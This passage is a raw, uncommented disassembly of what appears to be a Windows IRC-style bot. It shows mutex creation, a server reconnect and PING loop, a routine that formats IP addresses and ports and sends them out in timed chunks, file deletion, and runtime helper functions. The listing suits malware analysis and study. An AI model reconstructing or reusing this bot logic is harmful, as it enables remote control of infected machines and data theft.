mov byte ptr [eax], 3Eh
loc_410282: ; CODE XREF: sub_40FFBC+2C1�j
cmp [eax], bl
jnz short loc_410289
mov byte ptr [eax], 2Eh
loc_410289: ; CODE XREF: sub_40FFBC+2C8�j
inc ecx
cmp ecx, [ebp+arg_0]
jb short loc_41026E
loc_41028F: ; CODE XREF: sub_40FFBC+2B0�j
xor eax, eax
xor ecx, ecx
cmp [esi], bl
mov [ebp+arg_0], ecx
jz short loc_4102B4
loc_41029A: ; CODE XREF: sub_40FFBC+2F3�j
mov dl, [eax+esi]
cmp dl, 7Fh
jge short loc_4102AB
cmp dl, 1Fh
jle short loc_4102AB
mov [ecx+esi], dl
inc ecx
loc_4102AB: ; CODE XREF: sub_40FFBC+2E4�j
; sub_40FFBC+2E9�j
inc eax
cmp [eax+esi], bl
jnz short loc_41029A
mov [ebp+arg_0], ecx
loc_4102B4: ; CODE XREF: sub_40FFBC+2DC�j
mov al, [eax+esi]
cmp ecx, ebx
mov [ecx+esi], al
jz loc_4103F4
push 100h
push [ebp+var_1990]
call ds:dword_411230 ; inet_ntoa
push eax
lea eax, [ebp+var_870]
push eax
call sub_4052A6
add esp, 0Ch
push 100h
push [ebp+var_198C]
call ds:dword_411230 ; inet_ntoa
push eax
lea eax, [ebp+var_770]
push eax
call sub_4052A6
mov ax, [edi+2]
add esp, 0Ch
push eax
call ds:dword_411248 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_770]
push eax
mov ax, [edi]
push eax
call ds:dword_411248 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_870]
push eax
lea eax, [ebp+var_670]
push offset dword_4176F8
push eax
call sub_410844 ; sprintf
mov edi, eax
mov eax, 180h
sub eax, edi
push eax
lea eax, [ebp+edi+var_670]
push esi
push eax
call sub_4052A6
add esp, 24h
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_1E8]
push offset dword_412B30
push eax
call sub_408D50
add esp, 0Ch
push 3E8h
call ds:dword_4110A4 ; Sleep
mov eax, [ebp+var_3F0]
cmp [eax+4], ebx
jnz short loc_4103FC
mov eax, 17Fh
sub eax, edi
mov edi, [ebp+arg_0]
cmp eax, edi
mov [ebp+var_4], eax
jnb short loc_4103F4
add esi, eax
loc_41039F: ; CODE XREF: sub_40FFBC+436�j
push 180h
lea eax, [ebp+var_670]
push esi
push eax
call sub_4052A6
add esp, 0Ch
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_1E8]
push offset dword_412B30
push eax
call sub_408D50
add esp, 0Ch
push 3E8h
call ds:dword_4110A4 ; Sleep
mov eax, [ebp+var_3F0]
cmp [eax+4], ebx
jnz short loc_4103FC
mov eax, 17Fh
add [ebp+var_4], eax
add esi, eax
cmp [ebp+var_4], edi
jb short loc_41039F
loc_4103F4: ; CODE XREF: sub_40FFBC+20B�j
; sub_40FFBC+222�j ...
mov esi, [ebp+var_C]
jmp loc_410158
; ---------------------------------------------------------------------------
loc_4103FC: ; CODE XREF: sub_40FFBC+3CE�j
; sub_40FFBC+427�j
mov esi, [ebp+var_C]
loc_4103FF: ; CODE XREF: sub_40FFBC+82�j
; sub_40FFBC+B7�j ...
push esi
call ds:dword_411240 ; closesocket
loc_410406: ; CODE XREF: sub_40FFBC+59�j
push [ebp+var_3F0]
call sub_406753
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_40FFBC endp
; =============== S U B R O U T I N E =======================================
sub_41041B proc near ; CODE XREF: sub_40735A+3E4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push 3ABh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_41049F
cmp [esp+4+arg_4], 0
jz short loc_410440
push [esp+4+arg_4]
call sub_41088C ; atoi
pop ecx
jmp short loc_410443
; ---------------------------------------------------------------------------
loc_410440: ; CODE XREF: sub_41041B+17�j
push 3
pop eax
loc_410443: ; CODE XREF: sub_41041B+23�j
mov [esi+4], eax
mov eax, [esp+4+arg_8]
test eax, eax
jnz short loc_410453
mov eax, offset byte_417B60
loc_410453: ; CODE XREF: sub_41041B+31�j
push edi
push 200h
push eax
lea eax, [esi+8]
push eax
call sub_4052A6
mov edi, [esp+14h+arg_0]
push 1A3h
lea eax, [esi+208h]
push edi
push eax
call sub_410838 ; memcpy
xor eax, eax
add esp, 18h
cmp [edi+18Bh], al
push dword ptr [esi+4]
setz al
push offset dword_417760
push eax
push esi
push offset sub_40FFBC
call sub_40663C
add esp, 14h
pop edi
loc_41049F: ; CODE XREF: sub_41041B+10�j
pop esi
retn
sub_41041B endp
; =============== S U B R O U T I N E =======================================
sub_4104A1 proc near ; CODE XREF: sub_410521+4�p
arg_0 = dword ptr 4
push offset aRb ; "rb"
push [esp+4+arg_0]
call sub_41086E ; fopen
pop ecx
test eax, eax
pop ecx
jz short loc_4104C0
push eax
call sub_410868 ; fclose
pop ecx
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4104C0: ; CODE XREF: sub_4104A1+12�j
xor eax, eax
retn
sub_4104A1 endp
; =============== S U B R O U T I N E =======================================
sub_4104C3 proc near ; CODE XREF: sub_40735A+504�p
arg_0 = dword ptr 4
push esi
push offset aRb ; "rb"
push [esp+8+arg_0]
call sub_41086E ; fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_41050C
push edi
push 2
push 0
push esi
call sub_410886 ; fseek
push esi
call sub_41085C ; ftell
push 0
push 0
push esi
mov edi, eax
call sub_410886 ; fseek
push esi
call sub_410868 ; fclose
mov eax, edi
add esp, 20h
inc eax
neg eax
sbb eax, eax
and eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41050C: ; CODE XREF: sub_4104C3+15�j
xor eax, eax
pop esi
retn
sub_4104C3 endp
; =============== S U B R O U T I N E =======================================
sub_410510 proc near ; CODE XREF: sub_410521+12�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4110B8 ; DeleteFileA
neg eax
sbb eax, eax
neg eax
retn
sub_410510 endp
; =============== S U B R O U T I N E =======================================
sub_410521 proc near ; CODE XREF: sub_402018+11F�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4104A1
test eax, eax
pop ecx
jz short loc_41053F
push [esp+arg_0]
call sub_410510
neg eax
sbb eax, eax
pop ecx
inc eax
retn
; ---------------------------------------------------------------------------
loc_41053F: ; CODE XREF: sub_410521+C�j
xor eax, eax
retn
sub_410521 endp
; =============== S U B R O U T I N E =======================================
sub_410542 proc near ; CODE XREF: sub_40735A+347�p
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push dword ptr [eax]
call sub_409CCF
pop ecx
retn
sub_410542 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4112A8
push offset sub_410ACA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_4108B0
push ebx
push esi
push edi
mov [ebp-18h], esp
push 2
call ds:dword_4110FC ; SetErrorMode
xor edi, edi
mov [ebp-4], edi
push dword_4177A4
push dword_4177A0
push 398h
push dword_41779C
push edi
push dword_417798
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp-115Ch]
push eax
call sub_410844 ; sprintf
add esp, 20h
mov [ebp-1128h], edi
loc_4105C3: ; CODE XREF: seg000:004107D6�j
cmp dword ptr [ebp-1128h], 0Ah
jnz short loc_4105D1
call sub_404BC3
loc_4105D1: ; CODE XREF: seg000:004105CA�j
push 3E8h
call ds:dword_4110A4 ; Sleep
lea eax, [ebp-115Ch]
push eax
push edi
push edi
call ds:dword_411100 ; CreateMutexA
mov [ebp-12F0h], eax
cmp eax, edi
jz loc_4107D0
call ds:dword_41106C ; RtlGetLastWin32Error
test eax, eax
jnz loc_4107D0
call sub_402D7B
call sub_403E9B
call sub_40647C
call sub_40DE2B
call sub_40A9A3
call sub_409AB1
push 10h
mov esi, offset dword_417798
push esi
call sub_40ABCC
push 10h
push esi
call sub_409C8B
push 10h
push esi
call sub_409D01
add esp, 18h
call sub_40AB05
mov dword_418960, eax
call sub_40AB05
mov dword_418964, eax
call sub_40AB05
mov dword_418968, eax
call sub_40AB05
mov dword_41896C, eax
push 104h
lea eax, [ebp-1120h]
push eax
push edi
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
test eax, eax
jnz short loc_41069E
loc_41068B: ; CODE XREF: seg000:004106B3�j
push offset byte_417B60
push offset dword_41885C
call sub_410820 ; _mbscpy
pop ecx
pop ecx
jmp short loc_4106E4
; ---------------------------------------------------------------------------
loc_41069E: ; CODE XREF: seg000:00410689�j
lea eax, [ebp-1120h]
push eax
call sub_410826 ; strlen
pop ecx
loc_4106AB: ; CODE XREF: seg000:004107CB�j
mov [ebp-12F4h], eax
cmp eax, edi
jz short loc_41068B
cmp byte ptr [ebp+eax-1121h], 5Ch
jnz loc_4107CA
lea eax, [ebp+eax-1120h]
push eax
mov esi, offset dword_41885C
push esi
call sub_410820 ; _mbscpy
push esi
push offset dword_418970
call sub_410820 ; _mbscpy
add esp, 10h
loc_4106E4: ; CODE XREF: seg000:0041069C�j
call sub_4049B5
lea eax, [ebp-12ECh]
push eax
push 202h
call ds:dword_411274 ; WSAStartup
loc_4106FB: ; CODE XREF: seg000:004107A2�j
push edi
push edi
push edi
call sub_408BA7
add esp, 0Ch
call sub_406324
mov [ebp-1124h], edi
mov [ebp-101Ch], edi
loc_410717: ; CODE XREF: seg000:004107C5�j
mov dword ptr [ebp-4], 1
loc_41071E: ; CODE XREF: seg000:00410758�j
; seg000:00410760�j
push 0EA60h
call sub_40882C
push eax
call sub_403DD6
pop ecx
pop ecx
test eax, eax
jnz short loc_410762
cmp dword ptr [ebp-101Ch], 19h
jz short loc_41079F
cmp dword ptr [ebp-101Ch], 14h
jnz short loc_41075A
call sub_40AB05
push eax
push offset aPing08x ; "PING :%08X"
call sub_408E60
pop ecx
loc_410757: ; CODE XREF: seg000:0041079D�j
pop ecx
jmp short loc_41071E
; ---------------------------------------------------------------------------
loc_41075A: ; CODE XREF: seg000:00410744�j
inc dword ptr [ebp-101Ch]
jmp short loc_41071E
; ---------------------------------------------------------------------------
loc_410762: ; CODE XREF: seg000:00410732�j
push 1000h
lea eax, [ebp-1018h]
push eax
call sub_40882C
push eax
call sub_403D69
add esp, 0Ch
mov [ebp-1124h], eax
cmp eax, edi
jz short loc_41079F
cmp eax, 0FFFFFFFFh
jz short loc_41079F
mov [ebp-101Ch], edi
lea eax, [ebp-1018h]
push eax
call sub_409A8C
jmp short loc_410757
; ---------------------------------------------------------------------------
loc_41079F: ; CODE XREF: seg000:0041073B�j
; seg000:00410784�j ...
mov [ebp-4], edi
jmp loc_4106FB
; ---------------------------------------------------------------------------
loc_4107A7: ; DATA XREF: seg001:004112B8�o
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40287C
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_4107BD: ; DATA XREF: seg001:004112BC�o
mov esp, [ebp-18h]
xor edi, edi
mov [ebp-4], edi
jmp loc_410717
; ---------------------------------------------------------------------------
loc_4107CA: ; CODE XREF: seg000:004106BD�j
dec eax
jmp loc_4106AB
; ---------------------------------------------------------------------------
loc_4107D0: ; CODE XREF: seg000:004105F3�j
; seg000:00410601�j
inc dword ptr [ebp-1128h]
jmp loc_4105C3
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40287C
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
xor edi, edi
cmp dword_417B68, edi
jz short loc_410813
push offset dword_417A88
push offset dword_4177EC
call sub_408CDE
pop ecx
pop ecx
loc_410813: ; CODE XREF: seg000:00410800�j
call ds:dword_411260 ; WSACleanup
push edi
call sub_4108EC ; exit
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410820 proc near ; CODE XREF: sub_401000+36�p
; sub_401B81+61�p ...
jmp ds:dword_41113C
sub_410820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410826 proc near ; CODE XREF: sub_40110A+64�p
; sub_4014B0+B�p ...
jmp ds:dword_4111D0
sub_410826 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41082C proc near ; CODE XREF: sub_4011C4+6D�p
; sub_4014B0+1A�p ...
jmp ds:dword_4111CC
sub_41082C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410832 proc near ; CODE XREF: sub_4011C4+20�p
; sub_4011C4+283�p ...
jmp ds:dword_4111C8
sub_410832 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410838 proc near ; CODE XREF: sub_4011C4+18�p
; sub_401621+1B�p ...
jmp ds:dword_4111C4
sub_410838 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41083E proc near ; CODE XREF: sub_4014B0+43�p
; sub_401EA8+84�p ...
jmp ds:dword_4111C0
sub_41083E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410844 proc near ; CODE XREF: sub_401571+97�p
; sub_4043B3+1CA�p ...
jmp ds:dword_4111BC
sub_410844 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41084A proc near ; CODE XREF: sub_401571+30�p
; sub_401571+4B�p ...
jmp ds:dword_4111B8
sub_41084A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410850 proc near ; CODE XREF: sub_401621+CF�p
; sub_401621+DD�p ...
jmp ds:dword_4111B4
sub_410850 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410856 proc near ; CODE XREF: sub_4018D5+8A�p
; sub_4027CB+45�p ...
jmp ds:dword_4111B0
sub_410856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41085C proc near ; CODE XREF: sub_401985+150�p
; sub_401B81+120�p ...
jmp ds:dword_4111AC
sub_41085C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410862 proc near ; CODE XREF: sub_401985+122�p
; sub_402018+166�p ...
jmp ds:dword_4111A8
sub_410862 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410868 proc near ; CODE XREF: sub_401985+85�p
; sub_401985+1D8�p ...
jmp ds:dword_4111A4
sub_410868 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41086E proc near ; CODE XREF: sub_401985+42�p
; sub_401B81+F1�p ...
jmp ds:dword_4111A0
sub_41086E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410880 proc near ; CODE XREF: sub_401B81+1EA�p
; sub_401B81+232�p ...
jmp ds:dword_41119C
sub_410880 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410886 proc near ; CODE XREF: sub_401B81+11A�p
; sub_401B81+12B�p ...
jmp ds:dword_411198
sub_410886 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41088C proc near ; CODE XREF: sub_401EA8+2F�p
; sub_401EA8+4E�p ...
jmp ds:dword_411194
sub_41088C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410892 proc near ; CODE XREF: sub_402018+DD�p
; sub_40849F+A2�p ...
jmp ds:dword_411190
sub_410892 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410898 proc near ; CODE XREF: sub_402018+98�p
; sub_402018+B8�p ...
jmp ds:dword_41118C
sub_410898 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41089E proc near ; CODE XREF: sub_402018+47�p
; sub_40311D+1F�p ...
jmp ds:dword_411188
sub_41089E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4108B0 proc near ; CODE XREF: sub_402EFD+8�p
; sub_403DD6+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4108D0
loc_4108BC: ; CODE XREF: sub_4108B0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4108BC
loc_4108D0: ; CODE XREF: sub_4108B0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4108B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4108E0 proc near ; CODE XREF: sub_403201+D�p
; sub_403201+26�p ...
jmp ds:dword_411184
sub_4108E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4108E6 proc near ; CODE XREF: sub_403F1D:loc_403F5D�p
jmp ds:dword_411180
sub_4108E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4108EC proc near ; CODE XREF: sub_4049B5+209�p
; seg000:0041081A�p
jmp ds:dword_41117C
sub_4108EC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410900 proc near ; CODE XREF: sub_4057B0+53�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_410921
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_410971
; ---------------------------------------------------------------------------
loc_410921: ; CODE XREF: sub_410900+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41092F: ; CODE XREF: sub_410900+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41092F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41095A
cmp edx, [esp+4+arg_4]
ja short loc_41095A
jb short loc_410962
cmp eax, [esp+4+arg_0]
jbe short loc_410962
loc_41095A: ; CODE XREF: sub_410900+4A�j
; sub_410900+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_410962: ; CODE XREF: sub_410900+52�j
; sub_410900+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_410971: ; CODE XREF: sub_410900+1F�j
pop ebx
retn 10h
sub_410900 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410980 proc near ; CODE XREF: sub_4057B0+2F�p
; sub_4057B0+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_4109A2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4109E3
; ---------------------------------------------------------------------------
loc_4109A2: ; CODE XREF: sub_410980+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4109B0: ; CODE XREF: sub_410980+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4109B0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4109DE
cmp edx, [esp+8+arg_4]
ja short loc_4109DE
jb short loc_4109DF
cmp eax, [esp+8+arg_0]
jbe short loc_4109DF
loc_4109DE: ; CODE XREF: sub_410980+4E�j
; sub_410980+54�j
dec esi
loc_4109DF: ; CODE XREF: sub_410980+56�j
; sub_410980+5C�j
xor edx, edx
mov eax, esi
loc_4109E3: ; CODE XREF: sub_410980+20�j
pop esi
pop ebx
retn 10h
sub_410980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4109E8 proc near ; CODE XREF: sub_405CC8+171�p
; sub_406324+5A�p ...
jmp ds:dword_411178
sub_4109E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4109F0 proc near ; CODE XREF: sub_406096+5F�p
; sub_406110+A6�p
cmp cl, 40h
jnb short loc_410A0A
cmp cl, 20h
jnb short loc_410A00
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_410A00: ; CODE XREF: sub_4109F0+8�j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_410A0A: ; CODE XREF: sub_4109F0+3�j
xor eax, eax
xor edx, edx
retn
sub_4109F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410A10 proc near ; CODE XREF: sub_406324+53�p
; sub_40639B+53�p ...
jmp ds:dword_411174
sub_410A10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410A20 proc near ; CODE XREF: sub_406324+40�p
; sub_40639B+40�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_410A41
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_410A41: ; CODE XREF: sub_410A20+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_410A5D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_410A5D: ; CODE XREF: sub_410A20+27�j
or eax, eax
jnz short loc_410A79
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_410ABA
; ---------------------------------------------------------------------------
loc_410A79: ; CODE XREF: sub_410A20+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_410A87: ; CODE XREF: sub_410A20+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_410A87
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_410AB5
cmp edx, [esp+0Ch+arg_4]
ja short loc_410AB5
jb short loc_410AB6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_410AB6
loc_410AB5: ; CODE XREF: sub_410A20+85�j
; sub_410A20+8B�j
dec esi
loc_410AB6: ; CODE XREF: sub_410A20+8D�j
; sub_410A20+93�j
xor edx, edx
mov eax, esi
loc_410ABA: ; CODE XREF: sub_410A20+57�j
dec edi
jnz short loc_410AC4
neg edx
neg eax
sbb edx, 0
loc_410AC4: ; CODE XREF: sub_410A20+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_410A20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410ACA proc near ; DATA XREF: sub_4064A0+A�o
; sub_406596+A�o ...
jmp ds:dword_411170
sub_410ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AD0 proc near ; CODE XREF: sub_406541+31�p
; sub_40663C+D0�p
jmp ds:dword_41116C
sub_410AD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AD6 proc near ; CODE XREF: sub_40663C+A4�p
jmp ds:dword_411168
sub_410AD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410ADC proc near ; CODE XREF: sub_406B1B+B0�p
; sub_406B1B+B6�p ...
jmp ds:dword_411164
sub_410ADC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AE2 proc near ; CODE XREF: sub_406B1B+3E�p
; sub_406B1B+62�p
jmp ds:dword_411160
sub_410AE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AE8 proc near ; CODE XREF: sub_406B1B+19�p
; sub_406BE0+16F�p
jmp ds:dword_41115C
sub_410AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AEE proc near ; CODE XREF: sub_406F40+E0�p
; sub_40735A+16E�p ...
jmp ds:dword_411158
sub_410AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AF4 proc near ; CODE XREF: sub_407290+54�p
jmp ds:dword_411154
sub_410AF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410AFA proc near ; CODE XREF: sub_40735A+C28�p
; sub_40AC87+3D�p ...
jmp ds:dword_411150
sub_410AFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B00 proc near ; CODE XREF: sub_408C6C+38�p
; sub_408CDE+38�p ...
jmp ds:dword_41114C
sub_410B00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B06 proc near ; CODE XREF: sub_409E49+31�p
; sub_409E49+54�p
jmp ds:dword_411148
sub_410B06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B0C proc near ; CODE XREF: sub_409EB3+2F�p
; sub_409EB3+58�p
jmp ds:dword_411144
sub_410B0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B12 proc near ; CODE XREF: sub_409EB3+17�p
jmp ds:dword_411140
sub_410B12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B18 proc near ; CODE XREF: sub_40B7A2+67�p
; sub_40C225+301�p ...
jmp ds:dword_411138
sub_410B18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B1E proc near ; CODE XREF: sub_40C225+3AF�p
; sub_40C225+425�p
jmp ds:dword_411134
sub_410B1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B24 proc near ; CODE XREF: sub_40C225+1E5�p
; sub_40C225+23C�p
jmp ds:dword_411130
sub_410B24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B2A proc near ; CODE XREF: sub_40C225+1AA�p
jmp ds:dword_41112C
sub_410B2A endp
; ---------------------------------------------------------------------------
loc_410B30: ; CODE XREF: seg000:00410CF5�j
jmp ds:dword_411128
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_410B38 proc near ; CODE XREF: sub_40F54D+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_410B38 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_410B58 proc near ; CODE XREF: sub_40371E+2F�p
; sub_40371E+151�p ...
jmp ds:dword_41120C
sub_410B58 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410B60 proc near ; CODE XREF: sub_40F54D+6D�p
; sub_40F54D+DA�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_410BCF
retn 4
sub_410B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B6E proc near ; CODE XREF: sub_40F54D+8C�p
; sub_40F54D+15B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_410BC0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_417B00
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_410BC0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_410BC0
lea eax, [ebp+var_4]
push eax
push 0
call ds:dword_4111DC
test eax, eax
jz short loc_410BC0
and [ebp+var_4], 0
loc_410BC0: ; CODE XREF: sub_410B6E+D�j
; sub_410B6E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_410BCF
leave
retn 0Ch
sub_410B6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BCF proc near ; CODE XREF: sub_410B60+6�p
; sub_410B6E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BF3
lea eax, [ebp+var_10]
push offset dword_4113C8
push eax
call sub_410CC2 ; _CxxThrowException
sub_410BCF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_410BF3 proc near ; CODE XREF: sub_410BCF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
